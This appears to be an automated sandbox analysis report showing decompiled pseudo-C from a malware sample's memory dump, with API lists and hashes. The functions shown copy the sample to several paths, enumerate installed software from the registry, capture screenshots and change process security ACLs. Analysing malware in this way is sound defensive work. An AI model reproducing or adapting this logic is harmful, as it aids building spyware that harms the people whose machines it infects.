				void* _t292;
				CHAR* _t295;
				intOrPtr* _t296;
				void* _t305;
				void* _t308;
				void* _t314;
				void* _t320;
				intOrPtr _t326;
				intOrPtr _t327;
				intOrPtr _t368;
				intOrPtr _t369;

				_t366 = __esi;
				_t319 = __ebx;
				_t368 = _t369;
				_t320 = 0x12;
				goto L1;
				L5:
				_t118 = E2405272C(_t319, _t366, _t372);
				_t373 = _t118;
				if(_t118 != 0) {
					_push(0);
					E240527D8( &_v36, _t319, _t366, _t373);
					_push( &_v36);
					E24052EDC(_v8, _t320,  &_v40);
					_pop(_t260);
					E24013344(_t260, _v40);
					_t263 = E24013534(_v36);
					_t264 =  *0x2405ac24; // 0x2405b980
					CopyFileA(E24013534( *_t264), _t263, ??);
					E240527D8( &_v44, _t319, _t366, _t373);
					_push( &_v44);
					E24052EDC(_v8, _t320,  &_v48);
					_pop(_t273);
					E24013344(_t273, _v48);
					_t276 = E24016C78(_v44, _t319, _t373);
					_t374 = _t276 - 1;
					if(_t276 == 1) {
						_push(0x80);
						E240527D8( &_v52, _t319, _t366, _t374);
						_push( &_v52);
						E24052EDC(_v8, _t320,  &_v56);
						_pop(_t282);
						E24013344(_t282, _v56);
						SetFileAttributesA(E24013534(_v52), ??);
					}
				}
				_t119 = E24052900(_t319, _t366, _t374);
				_t375 = _t119;
				if(_t119 != 0) {
					_push(0);
					E24052990( &_v60, _t319, _t366, _t375);
					_push( &_v60);
					E24052EDC(_v8, _t320,  &_v64);
					_pop(_t228);
					E24013344(_t228, _v64);
					_t231 = E24013534(_v60);
					_t232 =  *0x2405ac24; // 0x2405b980
					CopyFileA(E24013534( *_t232), _t231, ??);
					E24052990( &_v68, _t319, _t366, _t375);
					_push( &_v68);
					E24052EDC(_v8, _t320,  &_v72);
					_pop(_t241);
					E24013344(_t241, _v72);
					_t244 = E24016C78(_v68, _t319, _t375);
					_t376 = _t244 - 1;
					if(_t244 == 1) {
						_push(0x80);
						E24052990( &_v76, _t319, _t366, _t376);
						_push( &_v76);
						E24052EDC(_v8, _t320,  &_v80);
						_pop(_t250);
						E24013344(_t250, _v80);
						SetFileAttributesA(E24013534(_v76), ??);
					}
				}
				_t120 = E24052AA4(_t319, _t366, _t376);
				_t377 = _t120;
				if(_t120 != 0) {
					_push(0);
					E24052B2C( &_v84, _t366, _t377);
					_push( &_v84);
					E24052EDC(_v8, _t320,  &_v88);
					_pop(_t196);
					E24013344(_t196, _v88);
					_t199 = E24013534(_v84);
					_t200 =  *0x2405ac24; // 0x2405b980
					CopyFileA(E24013534( *_t200), _t199, ??);
					E24052B2C( &_v92, _t366, _t377);
					_push( &_v92);
					E24052EDC(_v8, _t320,  &_v96);
					_pop(_t209);
					E24013344(_t209, _v96);
					_t212 = E24016C78(_v92, _t319, _t377);
					_t378 = _t212 - 1;
					if(_t212 == 1) {
						_push(0x80);
						E24052B2C( &_v100, _t366, _t378);
						_push( &_v100);
						E24052EDC(_v8, _t320,  &_v104);
						_pop(_t218);
						E24013344(_t218, _v104);
						SetFileAttributesA(E24013534(_v100), ??);
					}
				}
				_t121 = E24052B9C(_t319, _t366, _t378);
				_t379 = _t121;
				if(_t121 != 0) {
					_push(0);
					E24052C28( &_v108, _t366, _t379);
					_push( &_v108);
					E24052EDC(_v8, _t320,  &_v112);
					_pop(_t164);
					E24013344(_t164, _v112);
					_t167 = E24013534(_v108);
					_t168 =  *0x2405ac24; // 0x2405b980
					CopyFileA(E24013534( *_t168), _t167, ??);
					E24052C28( &_v116, _t366, _t379);
					_push( &_v116);
					E24052EDC(_v8, _t320,  &_v120);
					_pop(_t177);
					E24013344(_t177, _v120);
					_t180 = E24016C78(_v116, _t319, _t379);
					_t380 = _t180 - 1;
					if(_t180 == 1) {
						_push(0x80);
						E24052C28( &_v124, _t366, _t380);
						_push( &_v124);
						E24052EDC(_v8, _t320,  &_v128);
						_pop(_t186);
						E24013344(_t186, _v128);
						SetFileAttributesA(E24013534(_v124), ??);
					}
				}
				_t122 = E24052CD4(_t319, _t366, _t380);
				_t381 = _t122;
				if(_t122 != 0) {
					_push(0);
					E24052D64( &_v132, _t366, _t381);
					_push( &_v132);
					E24052EDC(_v8, _t320,  &_v136);
					_pop(_t132);
					E24013344(_t132, _v136);
					_t135 = E24013534(_v132);
					_t136 =  *0x2405ac24; // 0x2405b980
					CopyFileA(E24013534( *_t136), _t135, ??);
					E24052D64( &_v140, _t366, _t381);
					_push( &_v140);
					E24052EDC(_v8, _t320,  &_v144);
					_pop(_t145);
					E24013344(_t145, _v144);
					_t148 = E24016C78(_v140, _t319, _t381);
					_t382 = _t148 - 1;
					if(_t148 == 1) {
						_push(0x80);
						E24052D64( &_v148, _t366, _t382);
						_push( &_v148);
						E24052EDC(_v8, _t320,  &_v152);
						_pop(_t154);
						E24013344(_t154, _v152);
						SetFileAttributesA(E24013534(_v148), ??);
					}
				}
				_pop(_t326);
				 *[fs:eax] = _t326;
				_pop(_t327);
				 *[fs:eax] = _t327;
				_push(0x240533b4);
				return E240130AC( &_v152, 0x25);
				L1:
				_push(0);
				_push(0);
				_t320 = _t320 - 1;
				_t370 = _t320;
				if(_t320 != 0) {
					goto L1;
				} else {
					_push(_t320);
					_push(__ebx);
					_push(__esi);
					_v8 = __eax;
					E24013524(_v8);
					_push(_t368);
					_push(0x240533ad);
					_push( *[fs:eax]);
					 *[fs:eax] = _t369;
					_push(_t368);
					_push(0x2405337e);
					_push( *[fs:eax]);
					 *[fs:eax] = _t369;
					_t117 = E24052DDC(__ebx, __esi, _t370);
					_t371 = _t117;
					if(_t117 != 0) {
						_push(0);
						E24052E68( &_v12, __esi, _t371);
						_push( &_v12);
						E24052EDC(_v8, _t320,  &_v16);
						_pop(_t292);
						E24013344(_t292, _v16);
						_t295 = E24013534(_v12);
						_t296 =  *0x2405ac24; // 0x2405b980
						CopyFileA(E24013534( *_t296), _t295, ??);
						E24052E68( &_v20, _t366, _t371);
						_push( &_v20);
						E24052EDC(_v8, _t320,  &_v24);
						_pop(_t305);
						E24013344(_t305, _v24);
						_t308 = E24016C78(_v20, __ebx, _t371);
						_t372 = _t308 - 1;
						if(_t308 == 1) {
							_push(0x80);
							E24052E68( &_v28, _t366, _t372);
							_push( &_v28);
							E24052EDC(_v8, _t320,  &_v32);
							_pop(_t314);
							E24013344(_t314, _v32);
							SetFileAttributesA(E24013534(_v28), ??);
						}
					}
					goto L5;
				}
			}























































































                                    0x24052f20
                                    0x24052f20
                                    0x24052f21
                                    0x24052f23
                                    0x24052f23
                                    0x24053003
                                    0x24053003
                                    0x24053008
                                    0x2405300a
                                    0x24053010
                                    0x24053015
                                    0x2405301d
                                    0x24053024
                                    0x2405302c
                                    0x2405302d
                                    0x24053035
                                    0x2405303b
                                    0x24053048
                                    0x24053050
                                    0x24053058
                                    0x2405305f
                                    0x24053067
                                    0x24053068
                                    0x24053070
                                    0x24053075
                                    0x24053077
                                    0x24053079
                                    0x24053081
                                    0x24053089
                                    0x24053090
                                    0x24053098
                                    0x24053099
                                    0x240530a7
                                    0x240530a7
                                    0x24053077
                                    0x240530ac
                                    0x240530b1
                                    0x240530b3
                                    0x240530b9
                                    0x240530be
                                    0x240530c6
                                    0x240530cd
                                    0x240530d5
                                    0x240530d6
                                    0x240530de
                                    0x240530e4
                                    0x240530f1
                                    0x240530f9
                                    0x24053101
                                    0x24053108
                                    0x24053110
                                    0x24053111
                                    0x24053119
                                    0x2405311e
                                    0x24053120
                                    0x24053122
                                    0x2405312a
                                    0x24053132
                                    0x24053139
                                    0x24053141
                                    0x24053142
                                    0x24053150
                                    0x24053150
                                    0x24053120
                                    0x24053155
                                    0x2405315a
                                    0x2405315c
                                    0x24053162
                                    0x24053167
                                    0x2405316f
                                    0x24053176
                                    0x2405317e
                                    0x2405317f
                                    0x24053187
                                    0x2405318d
                                    0x2405319a
                                    0x240531a2
                                    0x240531aa
                                    0x240531b1
                                    0x240531b9
                                    0x240531ba
                                    0x240531c2
                                    0x240531c7
                                    0x240531c9
                                    0x240531cb
                                    0x240531d3
                                    0x240531db
                                    0x240531e2
                                    0x240531ea
                                    0x240531eb
                                    0x240531f9
                                    0x240531f9
                                    0x240531c9
                                    0x240531fe
                                    0x24053203
                                    0x24053205
                                    0x2405320b
                                    0x24053210
                                    0x24053218
                                    0x2405321f
                                    0x24053227
                                    0x24053228
                                    0x24053230
                                    0x24053236
                                    0x24053243
                                    0x2405324b
                                    0x24053253
                                    0x2405325a
                                    0x24053262
                                    0x24053263
                                    0x2405326b
                                    0x24053270
                                    0x24053272
                                    0x24053274
                                    0x2405327c
                                    0x24053284
                                    0x2405328b
                                    0x24053293
                                    0x24053294
                                    0x240532a2
                                    0x240532a2
                                    0x24053272
                                    0x240532a7
                                    0x240532ac
                                    0x240532ae
                                    0x240532b4
                                    0x240532b9
                                    0x240532c1
                                    0x240532cb
                                    0x240532d6
                                    0x240532d7
                                    0x240532df
                                    0x240532e5
                                    0x240532f2
                                    0x240532fd
                                    0x24053308
                                    0x24053312
                                    0x2405331d
                                    0x2405331e
                                    0x24053329
                                    0x2405332e
                                    0x24053330
                                    0x24053332
                                    0x2405333d
                                    0x24053348
                                    0x24053352
                                    0x2405335d
                                    0x2405335e
                                    0x2405336f
                                    0x2405336f
                                    0x24053330
                                    0x24053376
                                    0x24053379
                                    0x24053391
                                    0x24053394
                                    0x24053397
                                    0x240533ac
                                    0x24052f28
                                    0x24052f28
                                    0x24052f2a
                                    0x24052f2c
                                    0x24052f2c
                                    0x24052f2d
                                    0x00000000
                                    0x24052f2f
                                    0x24052f2f
                                    0x24052f30
                                    0x24052f31
                                    0x24052f33
                                    0x24052f39
                                    0x24052f40
                                    0x24052f41
                                    0x24052f46
                                    0x24052f49
                                    0x24052f4e
                                    0x24052f4f
                                    0x24052f54
                                    0x24052f57
                                    0x24052f5a
                                    0x24052f5f
                                    0x24052f61
                                    0x24052f67
                                    0x24052f6c
                                    0x24052f74
                                    0x24052f7b
                                    0x24052f83
                                    0x24052f84
                                    0x24052f8c
                                    0x24052f92
                                    0x24052f9f
                                    0x24052fa7
                                    0x24052faf
                                    0x24052fb6
                                    0x24052fbe
                                    0x24052fbf
                                    0x24052fc7
                                    0x24052fcc
                                    0x24052fce
                                    0x24052fd0
                                    0x24052fd8
                                    0x24052fe0
                                    0x24052fe7
                                    0x24052fef
                                    0x24052ff0
                                    0x24052ffe
                                    0x24052ffe
                                    0x24052fce
                                    0x00000000
                                    0x24052f61

                                    APIs
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 24052F9F
                                    • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,2405337E,?,00000000,240533AD,?,?,?,?,00000011,00000000), ref: 24052FFE
                                    • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,2405337E,?,00000000,240533AD,?,?,?,?,00000011,00000000), ref: 240530A7
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 240530F1
                                    • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,2405337E,?,00000000,240533AD,?,?,?,?,00000011,00000000), ref: 24053150
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 2405319A
                                    • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,2405337E,?,00000000,240533AD,?,?,?,?,00000011,00000000), ref: 240531F9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 24053243
                                    • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,2405337E,?,00000000,240533AD,?,?,?,?,00000011,00000000), ref: 240532A2
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 240532F2
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 24053048
                                      • Part of subcall function 24016C78: FindFirstFileA.KERNEL32(00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CAD
                                      • Part of subcall function 24016C78: FindClose.KERNEL32(00000000,00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CB8
                                    • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,2405337E,?,00000000,240533AD,?,?,?,?,00000011,00000000), ref: 2405336F
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesCopy$Find$CloseFirst
                                    • String ID:
                                    • API String ID: 1833752699-0
                                    • Opcode ID: baa0f628fedeec8c09cefdb8316db3f2de23363fdab78c50d05acc47240591e8
                                    • Instruction ID: 359cfd7101aec429d7ef9f99eca062af60452f41dc83782b37c2ed1683cf7852
                                    • Opcode Fuzzy Hash: baa0f628fedeec8c09cefdb8316db3f2de23363fdab78c50d05acc47240591e8
                                    • Instruction Fuzzy Hash: B9D1D9759102489BEF10EBA4D980ECDB7B8FF68608F504565E108FB128DF74AEC68F54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403B9E4, Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 168registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 40%
                                    			E2403B9E4(char __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _v12;
				int _v16;
				struct _FILETIME _v24;
				int _v28;
				int _v32;
				int _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t61;
				char* _t65;
				char* _t105;
				void* _t106;
				intOrPtr _t119;
				void* _t122;
				int _t139;
				intOrPtr* _t141;
				intOrPtr _t143;
				intOrPtr _t144;

				_t143 = _t144;
				_t106 = 8;
				do {
					_push(0);
					_push(0);
					_t106 = _t106 - 1;
				} while (_t106 != 0);
				_push(__ebx);
				_t141 = __edx;
				_v8 = __eax;
				E24013524(_v8);
				_push(_t143);
				_push(0x2403bc14);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144;
				E24013088(_t141);
				_t146 = _v8;
				if(_v8 == 0) {
					L13:
					_pop(_t119);
					 *[fs:eax] = _t119;
					_push(0x2403bc1b);
					E240130AC( &_v68, 0xb);
					return E24013088( &_v8);
				} else {
					_push( &_v12);
					_push(8);
					_push(0);
					_push( &_v40);
					_push(E24013674(0x2403bc2c, _v8) + 1);
					_t61 = E2401333C(_v8);
					_pop(_t122);
					E24013590(_v8, _t61, _t122);
					_t65 = E24013534(_v40);
					E24013590(_v8, E24013674(0x2403bc2c, _v8) - 1, 1,  &_v44);
					RegOpenKeyExA(E2403B8AC(_v44, __ebx, _t146), _t65, ??, ??, ??);
					_v16 = 0xff;
					_t105 = E24011344(_v16);
					_t139 = 0;
					while(RegEnumKeyExA(_v12, _t139, _t105,  &_v16, 0, 0, 0,  &_v24) == 0) {
						E24013274( &_v52, _t105);
						E24013388( &_v48, _v52, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\");
						E2403B7D8(_v48, _t105,  &_v28, "DisplayName", _t139, _t141, __eflags);
						E24013274( &_v60, _t105);
						E24013388( &_v56, _v60, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\");
						E2403B7D8(_v56, _t105,  &_v32, "UninstallString", _t139, _t141, __eflags);
						E24013274( &_v68, _t105);
						E24013388( &_v64, _v68, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\");
						E2403B7D8(_v64, _t105,  &_v36, "QuietUninstallString", _t139, _t141, __eflags);
						__eflags = _v28;
						if(_v28 != 0) {
							_push( *_t141);
							_push(_v28);
							_push("##@@");
							E240133FC();
							__eflags = _v36;
							if(_v36 == 0) {
								__eflags = _v32;
								if(_v32 == 0) {
									_push( *_t141);
									_push(0x2403bcf8);
									_push("##@@");
									_push("NNN");
									_push("##@@");
									_push(0x2403bce0);
									E240133FC();
								} else {
									_push( *_t141);
									_push(_v32);
									_push("##@@");
									_push("NNN");
									_push("##@@");
									_push(0x2403bce0);
									E240133FC();
								}
							} else {
								_push( *_t141);
								_push(_v36);
								_push("##@@");
								_push("YYY");
								_push("##@@");
								_push(0x2403bce0);
								E240133FC();
							}
						}
						_t139 = _t139 + 1;
						__eflags = _t139;
						_v16 = 0xff;
					}
					RegCloseKey(_v12);
					goto L13;
				}
			}




























                                    0x2403b9e5
                                    0x2403b9e7
                                    0x2403b9ec
                                    0x2403b9ec
                                    0x2403b9ee
                                    0x2403b9f0
                                    0x2403b9f0
                                    0x2403b9f3
                                    0x2403b9f6
                                    0x2403b9f8
                                    0x2403b9fe
                                    0x2403ba05
                                    0x2403ba06
                                    0x2403ba0b
                                    0x2403ba0e
                                    0x2403ba13
                                    0x2403ba18
                                    0x2403ba1c
                                    0x2403bbf1
                                    0x2403bbf3
                                    0x2403bbf6
                                    0x2403bbf9
                                    0x2403bc06
                                    0x2403bc13
                                    0x2403ba22
                                    0x2403ba25
                                    0x2403ba26
                                    0x2403ba28
                                    0x2403ba2d
                                    0x2403ba3c
                                    0x2403ba40
                                    0x2403ba4a
                                    0x2403ba4b
                                    0x2403ba53
                                    0x2403ba75
                                    0x2403ba83
                                    0x2403ba88
                                    0x2403ba97
                                    0x2403ba99
                                    0x2403bbc7
                                    0x2403baa5
                                    0x2403bab5
                                    0x2403bac5
                                    0x2403bacf
                                    0x2403badf
                                    0x2403baef
                                    0x2403baf9
                                    0x2403bb09
                                    0x2403bb19
                                    0x2403bb1e
                                    0x2403bb22
                                    0x2403bb28
                                    0x2403bb2a
                                    0x2403bb2d
                                    0x2403bb39
                                    0x2403bb3e
                                    0x2403bb42
                                    0x2403bb6b
                                    0x2403bb6f
                                    0x2403bb98
                                    0x2403bb9a
                                    0x2403bb9f
                                    0x2403bba4
                                    0x2403bba9
                                    0x2403bbae
                                    0x2403bbba
                                    0x2403bb71
                                    0x2403bb71
                                    0x2403bb73
                                    0x2403bb76
                                    0x2403bb7b
                                    0x2403bb80
                                    0x2403bb85
                                    0x2403bb91
                                    0x2403bb91
                                    0x2403bb44
                                    0x2403bb44
                                    0x2403bb46
                                    0x2403bb49
                                    0x2403bb4e
                                    0x2403bb53
                                    0x2403bb58
                                    0x2403bb64
                                    0x2403bb64
                                    0x2403bb42
                                    0x2403bbbf
                                    0x2403bbbf
                                    0x2403bbc0
                                    0x2403bbc0
                                    0x2403bbec
                                    0x00000000
                                    0x2403bbec

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,?,00000000,00000008,?,00000000,2403BC14,?,?,?,?,00000000,00000000), ref: 2403BA83
                                    • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,00000008,?,00000000), ref: 2403BBDB
                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,000000FF,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,00000008,?), ref: 2403BBEC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnumOpen
                                    • String ID: ##@@$DisplayName$NNN$QuietUninstallString$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$UninstallString$YYY
                                    • API String ID: 1332880857-2804227269
                                    • Opcode ID: 564c9c8d713609c1f641bc7702e8563f38d20b6cd8f58eae5a57f6e5c29d2403
                                    • Instruction ID: e6b168dcf2a8f10ddfb81fe43d9b842120420963d320fc4a7a365377d4b13f95
                                    • Opcode Fuzzy Hash: 564c9c8d713609c1f641bc7702e8563f38d20b6cd8f58eae5a57f6e5c29d2403
                                    • Instruction Fuzzy Hash: A1512C30A20108ABEF10EA95C990FDEBFF9BF5860CF508065E514B725ADE749E86CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240372D8, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 125memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 75%
                                    			E240372D8(void* __eax, void* __edx) {
				intOrPtr _v34;
				short _v36;
				short _v38;
				intOrPtr _v42;
				short _v44;
				void _v56;
				signed int _v60;
				signed int _v64;
				void* _v72;
				void* _v76;
				struct HDC__* _v80;
				struct HBITMAP__* _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				struct HDC__* _v108;
				struct tagBITMAPINFO* _t68;
				void* _t73;
				void* _t93;
				signed int _t113;
				struct tagBITMAPINFO* _t115;
				DWORD _t116;
				signed int* _t117;

				_t117 =  &_v60;
				_v72 = __edx;
				_v76 = __eax;
				_t116 = 0;
				if(GetObjectA(_v72, 0x18,  &_v56) != 0) {
					if(0x20 == 0x18) {
						_t113 = 0;
					} else {
						_t113 = 1 << 0x20 << 2;
					}
					_v72 = E240372C4(0x20 * _v64) * _v60;
					_t17 = _t113 + 0x28; // 0x29
					_t115 = E24011344(_t17);
					if(_t115 != 0) {
						_t68 = _t115;
						_t68->bmiHeader = 0x28;
						_t68->bmiHeader.biWidth = _v64;
						_t68->bmiHeader.biHeight = _v60;
						_t68->bmiHeader.biPlanes = 1;
						_t68->bmiHeader.biBitCount = 0x20;
						_t68->bmiHeader.biCompression = 0;
						_t68->bmiHeader.biSizeImage = _v72;
						_t68->bmiHeader.biXPelsPerMeter = 0;
						_t68->bmiHeader.biYPelsPerMeter = 0;
						_t68->bmiHeader.biClrUsed = 0;
						_t68->bmiHeader.biClrImportant = 0;
						_t31 = _t113 + 0x3a; // 0x3b
						_v34 = _t31;
						_v38 = 0;
						_v36 = 0;
						_v42 = _v34 + _v72;
						_v44 = 0x4d42;
						_t73 = GlobalAlloc(0, _v72);
						_t93 = _t73;
						if(_t93 != 0) {
							GlobalFix(_t93);
							_v76 = _t73;
							_v80 = GetDC(0);
							if(GetDIBits(_v80, _v84, 0, _v60, _v76, _t115, 0) != 0) {
								E24023314( *_t117, 0xe,  &_v72);
								_t47 = _t113 + 0x2c; // 0x2d
								E24023314( *_t117, _t47, _t115);
								E24023314( *_t117, _v100, _v104);
								_t116 = 1;
							}
							ReleaseDC(0, _v108);
							GlobalUnWire(_t93);
							GlobalFree(_t93);
						}
					}
					E2401135C(_t115);
					DeleteObject(_v84);
				}
				return _t116;
			}

























                                    0x240372dc
                                    0x240372df
                                    0x240372e3
                                    0x240372e6
                                    0x240372fb
                                    0x24037309
                                    0x2403731b
                                    0x2403730b
                                    0x24037316
                                    0x24037316
                                    0x2403732d
                                    0x24037331
                                    0x24037339
                                    0x2403733d
                                    0x24037343
                                    0x24037345
                                    0x2403734f
                                    0x24037356
                                    0x24037359
                                    0x2403735f
                                    0x24037365
                                    0x2403736c
                                    0x24037371
                                    0x24037376
                                    0x2403737b
                                    0x24037380
                                    0x24037383
                                    0x24037386
                                    0x2403738a
                                    0x24037391
                                    0x240373a0
                                    0x240373a4
                                    0x240373b2
                                    0x240373b7
                                    0x240373bb
                                    0x240373c2
                                    0x240373c7
                                    0x240373d2
                                    0x240373f6
                                    0x24037404
                                    0x24037409
                                    0x24037411
                                    0x24037421
                                    0x24037426
                                    0x24037426
                                    0x24037432
                                    0x24037438
                                    0x2403743e
                                    0x2403743e
                                    0x240373bb
                                    0x24037448
                                    0x24037452
                                    0x24037452
                                    0x24037460

                                    APIs
                                    • GetObjectA.GDI32(?,00000018,?), ref: 240372F4
                                    • GlobalAlloc.KERNEL32(00000000,?), ref: 240373B2
                                    • GlobalFix.KERNEL32(00000000), ref: 240373C2
                                    • GetDC.USER32(00000000), ref: 240373CD
                                    • GetDIBits.GDI32(?,?,00000000,?,?,00000000,00000000), ref: 240373EF
                                    • ReleaseDC.USER32(00000000,?), ref: 24037432
                                    • GlobalUnWire.KERNEL32(00000000), ref: 24037438
                                    • GlobalFree.KERNEL32(00000000), ref: 2403743E
                                    • DeleteObject.GDI32(?), ref: 24037452
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Global$Object$AllocBitsDeleteFreeReleaseWire
                                    • String ID: BM
                                    • API String ID: 2671967280-2348483157
                                    • Opcode ID: 7239cca198844cb54eff92d7bf05901ef6670e854347018845be8973e6573da8
                                    • Instruction ID: 8e7414cf427611de08e11995701ccc77211d8543a951425a8c570c3674851b6b
                                    • Opcode Fuzzy Hash: 7239cca198844cb54eff92d7bf05901ef6670e854347018845be8973e6573da8
                                    • Instruction Fuzzy Hash: 6B412C716047019FE304DF69C880A5FFBE9EFD8714F40C929F9989B2A4E770E9458B92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240535C4, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 88COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 42%
                                    			E240535C4(void* __eax) {
				intOrPtr _v32;
				char* _v44;
				char _v45;
				char _v46;
				intOrPtr _v55;
				char _v56;
				char _v60;
				void* _v64;
				void* _v80;
				void* _v108;
				char* _t26;
				void* _t27;
				void* _t44;
				void*** _t45;

				_t44 = __eax;
				 *_t45 = 0;
				_v32 = 0;
				_push(_t45);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(4);
				_push(6);
				_push(__eax);
				L240534DC();
				if(0 == 0) {
					L5:
					E24015474();
					_v60 = 2;
					_v56 = 1;
					_v55 = 0;
					_v46 = 1;
					_v45 = 1;
					_v44 = "CURRENT_USER";
					_push( &_v64);
					_push(0);
					_t26 =  &_v60;
					_push(_t26);
					_push(1);
					L240534E4();
					if(_t26 != 0) {
						if( *_t45 != 0) {
							LocalFree( *( *_t45));
						}
						if(_v80 != 0) {
							LocalFree(_v80);
						}
					}
					_push(0);
					_t27 = _v80;
					_push(_t27);
					_push(0);
					_push(0);
					_push(4);
					_push(6);
					_push(_t44);
					L240534EC();
					if(_t27 == 0) {
						L15:
						return _t27;
					} else {
						if( *_t45 != 0) {
							_t27 = LocalFree( *( *_t45));
						}
						if(_v108 == 0) {
							goto L15;
						} else {
							return LocalFree(_v108);
						}
					}
				}
				if( *_t45 != 0) {
					LocalFree( *( *_t45));
				}
				if(_v64 != 0) {
					LocalFree(_v64);
				}
				goto L5;
			}

















                                    0x240535c9
                                    0x240535cf
                                    0x240535d4
                                    0x240535d8
                                    0x240535d9
                                    0x240535db
                                    0x240535dc
                                    0x240535de
                                    0x240535e0
                                    0x240535e2
                                    0x240535e4
                                    0x240535e5
                                    0x240535ec
                                    0x24053610
                                    0x24053619
                                    0x2405361e
                                    0x24053626
                                    0x2405362d
                                    0x24053631
                                    0x24053636
                                    0x24053640
                                    0x24053648
                                    0x24053649
                                    0x2405364a
                                    0x2405364e
                                    0x2405364f
                                    0x24053651
                                    0x24053658
                                    0x2405365e
                                    0x24053666
                                    0x24053666
                                    0x24053670
                                    0x24053677
                                    0x24053677
                                    0x24053670
                                    0x2405367c
                                    0x2405367e
                                    0x24053682
                                    0x24053683
                                    0x24053685
                                    0x24053687
                                    0x24053689
                                    0x2405368b
                                    0x2405368c
                                    0x24053693
                                    0x240536bc
                                    0x240536bc
                                    0x24053695
                                    0x24053699
                                    0x240536a1
                                    0x240536a1
                                    0x240536ab
                                    0x00000000
                                    0x240536ad
                                    0x00000000
                                    0x240536b2
                                    0x240536ab
                                    0x24053693
                                    0x240535f2
                                    0x240535fa
                                    0x240535fa
                                    0x24053604
                                    0x2405360b
                                    0x2405360b
                                    0x00000000

                                    APIs
                                    • GetSecurityInfo.ADVAPI32(00000000,00000006,00000004,00000000,00000000,00000000,00000000), ref: 240535E5
                                    • LocalFree.KERNEL32(?,00000000,00000006,00000004,00000000,00000000,00000000,00000000), ref: 240535FA
                                    • LocalFree.KERNEL32(00000000,00000000,00000006,00000004,00000000,00000000,00000000,00000000), ref: 2405360B
                                    • SetEntriesInAclA.ADVAPI32(00000001,00000000,00000000,?), ref: 24053651
                                    • LocalFree.KERNEL32(?,00000000,00000006,00000004,00000000,00000000), ref: 24053666
                                    • LocalFree.KERNEL32(00000000,00000000,00000006,00000004,00000000,00000000), ref: 24053677
                                    • SetSecurityInfo.ADVAPI32(00000000,00000006,00000004,00000000,00000000,00000002,00000000,00000000,00000006,00000004,00000000,00000000), ref: 2405368C
                                    • LocalFree.KERNEL32(?,00000000,00000006,00000004,00000000,00000000,00000002,00000000,00000000,00000006,00000004,00000000,00000000), ref: 240536A1
                                    • LocalFree.KERNEL32(00000000,00000000,00000006,00000004,00000000,00000000,00000002,00000000,00000000,00000006,00000004,00000000,00000000), ref: 240536B2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: FreeLocal$InfoSecurity$Entries
                                    • String ID: CURRENT_USER
                                    • API String ID: 3140748100-382982459
